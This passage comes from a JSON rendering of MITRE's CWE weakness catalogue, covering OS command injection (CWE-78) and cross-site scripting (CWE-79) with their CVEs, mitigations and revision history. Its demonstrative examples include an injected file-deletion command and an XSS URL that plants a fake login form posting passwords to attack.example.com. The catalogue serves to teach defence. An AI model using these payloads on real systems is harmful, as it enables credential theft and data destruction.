\\"+btype+\\"&amp;&amp;c:\\\\\\\\utl\\\\\\\\cleanup.bat\\\\\\"\\")","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"The problem here is that the program does not do any validation on the backuptype parameter read from the user. Typically the Runtime.exec() function will not execute multiple commands, but in this case the program first runs the cmd.exe shell in order to run multiple commands with a single call to Runtime.exec(). Once the shell is invoked, it will happily execute multiple commands separated by two ampersands. If an attacker passes a string of the form \\"&amp; del c:\\\\\\\\dbms\\\\\\\\*.*\\", then the application will execute this command along with the others specified by the program. Because of the nature of the application, it runs with the privileges necessary to interact with the database, which means whatever command the attacker injects will run with those privileges as well."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-0067","Description":"Canonical example of OS command injection. CGI program does not neutralize \\"|\\" metacharacter when invoking a phonebook program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0067"},{"Reference":"CVE-2001-1246","Description":"Language interpreter\'s mail function accepts another argument that is concatenated to a string used in a dangerous popen() call. Since there is no neutralization of this argument, both OS Command Injection (CWE-78) and Argument Injection (CWE-88) are possible.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1246"},{"Reference":"CVE-2002-0061","Description":"Web server allows command execution using \\"|\\" (pipe) character.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0061"},{"Reference":"CVE-2003-0041","Description":"FTP client does not filter \\"|\\" from filenames returned by the server, allowing for OS command injection.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0041"},{"Reference":"CVE-2008-2575","Description":"Shell metacharacters in a filename in a ZIP archive","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2575"},{"Reference":"CVE-2002-1898","Description":"Shell metacharacters in a telnet:// link are not properly handled when the launching application processes the link.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1898"},{"Reference":"CVE-2008-4304","Description":"OS command injection through environment variable.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4304"},{"Reference":"CVE-2008-4796","Description":"OS command injection through https:// URLs","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4796"},{"Reference":"CVE-2007-3572","Description":"Chain: incomplete denylist for OS command injection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3572"},{"Reference":"CVE-2012-1988","Description":"Product allows remote users to execute arbitrary commands by creating a file whose pathname contains shell metacharacters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1988"}]},"Functional_Areas":{"Functional_Area":"Program Invocation"},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"OS Command Injection"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A3","Entry_Name":"Malicious File Execution","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A6","Entry_Name":"Injection Flaws","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ENV03-C","Entry_Name":"Sanitize the environment when invoking external programs"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ENV33-C","Entry_Name":"Do not call system()","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR02-C","Entry_Name":"Sanitize data passed to complex subsystems"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":31,"Entry_Name":"OS Commanding"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS07-J","Entry_Name":"Do not pass untrusted, unsanitized data to the Runtime.exec() method"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-78"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"108"}},{"attr":{"@_CAPEC_ID":"15"}},{"attr":{"@_CAPEC_ID":"43"}},{"attr":{"@_CAPEC_ID":"6"}},{"attr":{"@_CAPEC_ID":"88"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-140"}},{"attr":{"@_External_Reference_ID":"REF-685"}},{"attr":{"@_External_Reference_ID":"REF-686"}},{"attr":{"@_External_Reference_ID":"REF-687","@_Section":"chapter: &#34;CGI Scripts&#34;"}},{"attr":{"@_External_Reference_ID":"REF-688"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 10: Command Injection.&#34; Page 171"}},{"attr":{"@_External_Reference_ID":"REF-690"}},{"attr":{"@_External_Reference_ID":"REF-45"}},{"attr":{"@_External_Reference_ID":"REF-76"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;Shell Metacharacters&#34;, Page 425"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-78"}}]},"Notes":{"Note":[{"#text":"The \\"OS command injection\\" phrase carries different meanings to different people. For some people, it only refers to cases in which the attacker injects command separators into arguments for an application-controlled program that is being invoked. For some people, it refers to any type of attack that can allow the attacker to execute OS commands of their own choosing. This usage could include untrusted search path weaknesses (CWE-426) that cause the application to find and execute an attacker-controlled program. Further complicating the issue is the case when argument injection (CWE-88) allows alternate command-line switches or options to be inserted into the command line, such as an \\"-exec\\" switch whose purpose may be to execute the subsequent argument as a command (this -exec switch exists in the UNIX \\"find\\" command, for example). In this latter case, however, CWE-88 could be regarded as the primary weakness in a chain with CWE-78.","attr":{"@_Type":"Terminology"}},{"#text":"More investigation is needed into the distinction between the OS command injection variants, including the role with argument injection (CWE-88). Equivalent distinctions may exist in other injection-related problems such as SQL injection.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships, Research_Gaps, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name, Related_Attack_Patterns"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Name, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Observed_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors, Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Description, Detection_Factors, Name, Observed_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples, Relationships"}],"Previous_Entry_Name":[{"#text":"OS Command Injection","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Data into an OS Command (aka \'OS Command Injection\')","attr":{"@_Date":"2009-01-12"}},{"#text":"Failure to Preserve OS Command Structure (aka \'OS Command Injection\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Preserve OS Command Structure (\'OS Command Injection\')","attr":{"@_Date":"2009-07-27"}},{"#text":"Improper Sanitization of Special Elements used in an OS Command (\'OS Command Injection\')","attr":{"@_Date":"2010-06-21"}}]}},"79":{"attr":{"@_ID":"79","@_Name":"Improper Neutralization of Input During Web Page Generation (\'Cross-site Scripting\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.","Extended_Description":{"xhtml:p":["Cross-site scripting (XSS) vulnerabilities occur when:","There are three main kinds of XSS:","Once the malicious script is injected, the attacker can perform a variety of malicious activities. The attacker could transfer private information, such as cookies that may include session information, from the victim\'s machine to the attacker. The attacker could send malicious requests to a web site on behalf of the victim, which could be especially dangerous to the site if the victim has administrator privileges to manage that site. Phishing attacks could be used to emulate trusted web sites and trick the victim into entering a password, allowing the attacker to compromise the victim\'s account on that web site. Finally, the script could exploit a vulnerability in the web browser itself possibly taking over the victim\'s machine, sometimes referred to as \\"drive-by hacking.\\"","In many cases, the attack can be launched without the victim even being aware of it. Even with careful users, attackers frequently use a variety of methods to encode the malicious portion of the attack, such as URL encoding or Unicode, so the request looks less suspicious."],"xhtml:ol":{"xhtml:li":["Untrusted data enters a web application, typically from a web request.","The web application dynamically generates a web page that contains this untrusted data.","During page generation, the application does not prevent the data from containing content that is executable by a web browser, such as JavaScript, HTML tags, HTML attributes, mouse events, Flash, ActiveX, etc.","A victim visits the generated web page through a web browser, which contains malicious script that was injected using the untrusted data.","Since the script comes from a web page that was sent by the web server, the victim\'s web browser executes the malicious script in the context of the web server\'s domain.","This effectively violates the intention of the web browser\'s same-origin policy, which states that scripts in one domain should not be able to access resources or run code in a different domain."]},"xhtml:ul":{"xhtml:li":[{"#text":"- \\n         \\t\\t\\tThe server reads data directly from the HTTP request and reflects it back in the HTTP response. Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content to a vulnerable web application, which is then reflected back to the victim and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to the victim. URLs constructed in this manner constitute the core of many phishing schemes, whereby an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects the attacker\'s content back to the victim, the content is executed by the victim\'s browser.","xhtml:b":"Type 1: Reflected XSS (or Non-Persistent)"},{"#text":"- \\n               The application stores dangerous data in a database, message forum, visitor log, or other trusted data store. At a later time, the dangerous data is subsequently read back into the application and included in dynamic content. From an attacker\'s perspective, the optimal place to inject malicious content is in an area that is displayed to either many users or particularly interesting users. Interesting users typically have elevated privileges in the application or interact with sensitive data that is valuable to the attacker. If one of these users executes malicious content, the attacker may be able to perform privileged operations on behalf of the user or gain access to sensitive data belonging to the user. For example, the attacker might inject XSS into a log message, which might not be handled properly when an administrator views the logs.","xhtml:b":"Type 2: Stored XSS (or Persistent)"},{"#text":"- \\n               In DOM-based XSS, the client performs the injection of XSS into the page; in the other types, the server performs the injection. DOM-based XSS generally involves server-controlled, trusted script that is sent to the client, such as Javascript that performs sanity checks on a form before the user submits it. If the server-supplied script processes user-supplied data and then injects it back into the web page (such as with dynamic HTML), then DOM-based XSS is possible.","xhtml:b":"Type 0: DOM-Based XSS"}]}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"494","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"352","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Often"}}},"Background_Details":{"Background_Detail":{"xhtml:div":[{"#text":"Same Origin Policy","attr":{"@_style":"color:#32498D; font-weight:bold;"}},{"#text":"Domain","attr":{"@_style":"color:#32498D; font-weight:bold;"}}],"xhtml:p":["The same origin policy states that browsers should limit the resources accessible to scripts running on a given web site, or \\"origin\\", to the resources associated with that web site on the client-side, and not the client-side resources of any other sites or \\"origins\\". The goal is to prevent one site from being able to modify or read the contents of an unrelated site. Since the World Wide Web involves interactions between many sites, this policy is important for browsers to enforce.","The Domain of a website when referring to XSS is roughly equivalent to the resources associated with that website on the client-side of the connection. That is, the domain can be thought of as all resources the browser is storing for the user\'s interactions with this particular site."]}},"Alternate_Terms":{"Alternate_Term":[{"Term":"XSS","Description":"\\"XSS\\" is a common abbreviation for Cross-Site Scripting."},{"Term":"HTML Injection","Description":"\\"HTML injection\\" is used as a synonym of stored (Type 2) XSS."},{"Term":"CSS","Description":"In the early years after initial discovery of XSS, \\"CSS\\" was a commonly-used acronym.  However, this would cause confusion with \\"Cascading Style Sheets,\\" so usage of this acronym has declined significantly."}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Access Control","Confidentiality"],"Impact":["Bypass Protection Mechanism","Read Application Data"],"Note":"The most common attack performed with cross-site scripting involves the disclosure of information stored in user cookies. Typically, a malicious user will craft a client-side script, which -- when parsed by a web browser -- performs some activity (such as sending all site cookies to a given E-mail address). This script will be loaded and run by each user visiting the web site. Since the site requesting to run the script has access to the cookies in question, the malicious script does also."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"In some circumstances it may be possible to run arbitrary code on a victim\'s computer when cross-site scripting is combined with other flaws."},{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Execute Unauthorized Code or Commands","Bypass Protection Mechanism","Read Application Data"],"Note":"The consequence of an XSS attack is the same regardless of whether it is stored or reflected. The difference is in how the payload arrives at the server. XSS can cause a variety of problems for the end user that range in severity from an annoyance to complete account compromise. Some cross-site scripting vulnerabilities can be exploited to manipulate or steal cookies, create requests that can be mistaken for those of a valid user, compromise confidential information, or execute malicious code on the end user systems for a variety of nefarious purposes. Other damaging attacks include the disclosure of end user files, installation of Trojan horse programs, redirecting the user to some other page or site, running \\"Active X\\" controls (under Microsoft Internet Explorer) from sites that a user perceives as trustworthy, and modifying presentation of content."}]},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis","Description":"Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible, especially when multiple components are involved.","Effectiveness":"Moderate"},{"Method":"Black Box","Description":"Use the XSS Cheat Sheet [REF-714] or automated test-generation tools to help launch a wide variety of attacks against your web application. The Cheat Sheet contains many subtle XSS variations that are specifically targeted against weak XSS defenses.","Effectiveness":"Moderate","Effectiveness_Notes":"With Stored XSS, the indirection caused by the data store can make it more difficult to find the problem. The tester must first inject the XSS string into the data store, then find the appropriate application functionality in which the XSS string is sent to other users of the application. These are two distinct steps in which the activation of the XSS can take place minutes, hours, or days after the XSS was originally injected into the data store."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft\'s Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket."]}},{"Phase":["Implementation","Architecture and Design"],"Description":{"xhtml:p":["Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.","For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.","Parts of the same output document may require different encodings, which will vary depending on whether the output is in the:","etc. Note that HTML Entity Encoding is only appropriate for the HTML body.","Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["HTML body","Element attributes (such as src=\\"XYZ\\")","URIs","JavaScript sections","Cascading Style Sheets and style property"]}}}},{"attr":{"@_Mitigation_ID":"MIT-6"},"Phase":["Architecture and Design","Implementation"],"Strategy":"Attack Surface Reduction","Description":"Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.","Effectiveness":"Limited","Effectiveness_Notes":"This technique has limited effectiveness, but can be helpful when it is possible to store client state and sensitive information on the server side instead of in cookies, headers, hidden form fields, etc."},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"attr":{"@_Mitigation_ID":"MIT-27"},"Phase":"Architecture and Design","Strategy":"Parameterization","Description":"If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated."},{"attr":{"@_Mitigation_ID":"MIT-30.1"},"Phase":"Implementation","Strategy":"Output Encoding","Description":{"xhtml:p":["Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.","The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks."]}},{"attr":{"@_Mitigation_ID":"MIT-43"},"Phase":"Implementation","Description":"With Struts, write all data from form beans with the bean\'s filter attribute set to true."},{"attr":{"@_Mitigation_ID":"MIT-31"},"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"To help mitigate XSS attacks against the user\'s session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user\'s session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.","Effectiveness":"Defense in Depth"},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When dynamically constructing web pages, use stringent allowlists that limit the character set based on the expected value of the parameter in the request. All input should be validated and cleansed, not just parameters that the user is supposed to specify, but all data in the request, including hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. It is common to see data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended.","Note that proper output encoding, escaping, and quoting is the most effective solution for preventing XSS, although input validation may provide some defense-in-depth. This is because it effectively limits what will appear in output. Input validation will not always prevent XSS, especially if you are required to support free-form text fields that could contain arbitrary characters. For example, in a chat application, the heart emoticon (\\"&lt;3\\") would likely pass the validation step, since it is commonly used. However, it cannot be directly inserted into the web page because it contains the \\"&lt;\\" character, which would need to be escaped or otherwise handled. In this case, stripping the \\"&lt;\\" might reduce the risk of XSS, but it would produce incorrect behavior because the emoticon would not be recorded. This might seem to be a minor inconvenience, but it would be more important in a mathematical forum that wants to represent inequalities.","Even if you make a mistake in your validation (such as forgetting one out of 100 input fields), appropriate encoding is still likely to protect you from injection-based attacks. As long as it is not done in isolation, input validation is still a useful technique, since it may significantly reduce your attack surface, allow you to detect some attacks, and provide other security benefits that proper encoding does not address.","Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere."]}},{"attr":{"@_Mitigation_ID":"MIT-21"},"Phase":"Architecture and Design","Strategy":"Enforcement by Conversion","Description":"When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs."},{"attr":{"@_Mitigation_ID":"MIT-29"},"Phase":"Operation","Strategy":"Firewall","Description":"Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth.","Effectiveness":"Moderate","Effectiveness_Notes":"An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization."},{"attr":{"@_Mitigation_ID":"MIT-16"},"Phase":["Operation","Implementation"],"Strategy":"Environment Hardening","Description":"When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This code displays a welcome message on a web page based on the HTTP GET username parameter. This example covers a Reflected XSS (Type 1) scenario.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$username = $_GET[\'username\'];echo \'&lt;div class=\\"header\\"&gt; Welcome, \' . $username . \'&lt;/div&gt;\';","xhtml:br":""}},{"attr":{"@_Nature":"attack"},"xhtml:div":"http://trustedSite.example.com/welcome.php?username=&lt;Script Language=\\"Javascript\\"&gt;alert(\\"You\'ve been attacked!\\");&lt;/Script&gt;"},{"attr":{"@_Nature":"attack"},"xhtml:div":"http://trustedSite.example.com/welcome.php?username=&lt;div id=\\"stealPassword\\"&gt;Please Login:&lt;form name=\\"input\\" action=\\"http://attack.example.com/stealPassword.php\\" method=\\"post\\"&gt;Username: &lt;input type=\\"text\\" name=\\"username\\" /&gt;&lt;br/&gt;Password: &lt;input type=\\"password\\" name=\\"password\\" /&gt;&lt;br/&gt;&lt;input type=\\"submit\\" value=\\"Login\\" /&gt;&lt;/form&gt;&lt;/div&gt;"},{"attr":{"@_Nature":"result"},"xhtml:div":{"#text":"&lt;div class=\\"header\\"&gt; Welcome, &lt;div id=\\"stealPassword\\"&gt; Please Login:&lt;/div&gt;&lt;/div&gt;","xhtml:div":{"#text":"&lt;form name=\\"input\\" action=\\"attack.example.com/stealPassword.php\\" method=\\"post\\"&gt;&lt;/form&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"Username: &lt;input type=\\"text\\" name=\\"username\\" /&gt;&lt;br/&gt;Password: &lt;input type=\\"password\\" name=\\"password\\" /&gt;&lt;br/&gt;&lt;input type=\\"submit\\" value=\\"Login\\" 